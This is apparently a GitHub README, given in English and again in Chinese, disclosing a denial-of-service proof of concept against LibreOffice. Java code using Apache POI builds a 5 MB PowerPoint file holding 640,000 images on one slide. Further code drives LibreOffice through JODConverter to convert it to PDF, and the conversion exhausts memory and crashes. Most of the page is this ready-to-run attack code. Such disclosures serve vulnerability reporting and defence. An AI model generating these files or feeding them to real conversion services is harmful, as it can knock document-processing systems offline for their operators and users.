Skip to content

Latest commit

 

History

History
202 lines (172 loc) · 6.31 KB

README.md

File metadata and controls

202 lines (172 loc) · 6.31 KB
  1. Generate malicious ppt files, using Java's POI plugin to generate them Produce a PowerPoint file with only one slide through the POI plugin, containing a total of 640000 images of 800 * 800,The ppt file size is 5 mb

The code is as follows:

public class PowerPointUtil {
    private static final int NUM =800;
    public static void main(String[] args) {
        String path="E:\\office\\test.pptx";
        try {
            createPPT(path);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public static void createPPT(String path) throws IOException {
        XMLSlideShow ppt = new XMLSlideShow();
        XSLFSlide slide = ppt.createSlide();
        byte[] bt = FileUtils.readFileToByteArray(new File("E:\\office\\test.png"));

        for (int i = 0; i < NUM; i++) {
            for (int j = 0; j < NUM; j++) {
                XSLFPictureData pictureData = ppt.addPicture(bt, PictureData.PictureType.PNG);
                XSLFPictureShape pic = slide.createPicture(pictureData);
                pic.setAnchor(new Rectangle(i, j, 50, 50));
            }
        }
        ppt.write(new FileOutputStream(path));
    }
}

2、Operate libreoffice through the org. jdconverter dependency package, and initialize the configuration as follows

The code is as follows:

public class OfficeManagerInstance {
    private static OfficeManager INSTANCE = null;
    public static synchronized void start() {
        officeManagerStart();
    }
    public static synchronized void stop() {
        try {
            INSTANCE.stop();
        } catch (OfficeException e) {
            e.printStackTrace();
        }
    }
    public static void init() {

            LocalOfficeManager.Builder builder = LocalOfficeManager.builder().install();
            builder.officeHome("E:\\libreOffice\\");
            builder.portNumbers(8098);
            builder.taskExecutionTimeout(5 * 1000 * 60); // minute
            builder.taskQueueTimeout(10 * 1000 * 60 * 60); // hour

            INSTANCE = builder.build();
            officeManagerStart();

    }
    private static void officeManagerStart() {
        if (INSTANCE.isRunning()) {
            return;
        }
        try {
            INSTANCE.start();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

3、Finally, call the OfficeManager to execute the operation of converting ppt to pdf

The code is as follows:

public class LibreOfficeUtil {
    public static void main(String[] args) {
        String pptPath="E:\\office\\test.pptx";
        String pdfPath="E:\\office\\test.pdf";

        OfficeManagerInstance.init();
        OfficeManagerInstance.start();

        try {
            JodConverter.convert(new File(pptPath)).to(new File(pdfPath)).execute();
        } catch (OfficeException e) {
            e.printStackTrace();
        }finally {
            OfficeManagerInstance.stop();
        }
    }
}

4、Looking at the memory usage situation, it can be found that only a 5m sized ppt file is needed to make libreoffice consume a large amount of memory on the machine. Afterwards, the program crashes, resulting in DOS issues

RS0_6I){_MC}D)``}36A0RC

1、生成恶意的 ppt 文件,这里采用 java 的 poi 插件去生成 通过 poi 插件,生产一个只有一张幻灯片的 ppt 文件,其中含有 800*800 共 64 万张图片,ppt 文件大小为 5 mb

代码如下:

public class PowerPointUtil {
    private static final int NUM =800;
    public static void main(String[] args) {
        String path="E:\\office\\test.pptx";
        try {
            createPPT(path);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public static void createPPT(String path) throws IOException {
        XMLSlideShow ppt = new XMLSlideShow();
        XSLFSlide slide = ppt.createSlide();
        byte[] bt = FileUtils.readFileToByteArray(new File("E:\\office\\test.png"));

        for (int i = 0; i < NUM; i++) {
            for (int j = 0; j < NUM; j++) {
                XSLFPictureData pictureData = ppt.addPicture(bt, PictureData.PictureType.PNG);
                XSLFPictureShape pic = slide.createPicture(pictureData);
                pic.setAnchor(new Rectangle(i, j, 50, 50));
            }
        }
        ppt.write(new FileOutputStream(path));
    }
}

2、通过 org.jodconverter 依赖包操作 libreoffice,初始化配置如下

代码片段:

public class OfficeManagerInstance {
    private static OfficeManager INSTANCE = null;
    public static synchronized void start() {
        officeManagerStart();
    }
    public static synchronized void stop() {
        try {
            INSTANCE.stop();
        } catch (OfficeException e) {
            e.printStackTrace();
        }
    }
    public static void init() {

            LocalOfficeManager.Builder builder = LocalOfficeManager.builder().install();
            builder.officeHome("E:\\libreOffice\\");
            builder.portNumbers(8098);
            builder.taskExecutionTimeout(5 * 1000 * 60); // minute
            builder.taskQueueTimeout(10 * 1000 * 60 * 60); // hour

            INSTANCE = builder.build();
            officeManagerStart();

    }
    private static void officeManagerStart() {
        if (INSTANCE.isRunning()) {
            return;
        }
        try {
            INSTANCE.start();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

3、最后调用 OfficeManager 去执行 ppt 转 pdf 的操作

代码如下:

public class LibreOfficeUtil {
    public static void main(String[] args) {
        String pptPath="E:\\office\\test.pptx";
        String pdfPath="E:\\office\\test.pdf";

        OfficeManagerInstance.init();
        OfficeManagerInstance.start();

        try {
            JodConverter.convert(new File(pptPath)).to(new File(pdfPath)).execute();
        } catch (OfficeException e) {
            e.printStackTrace();
        }finally {
            OfficeManagerInstance.stop();
        }
    }
}

4、查看内存占用情况,可以发现只需要 5m 大小的 ppt 文件就可以使 libreoffice 占用机器大量内存,之后程序崩溃,产生 DOS 问题

RS0_6I){_MC}D)``}36A0RC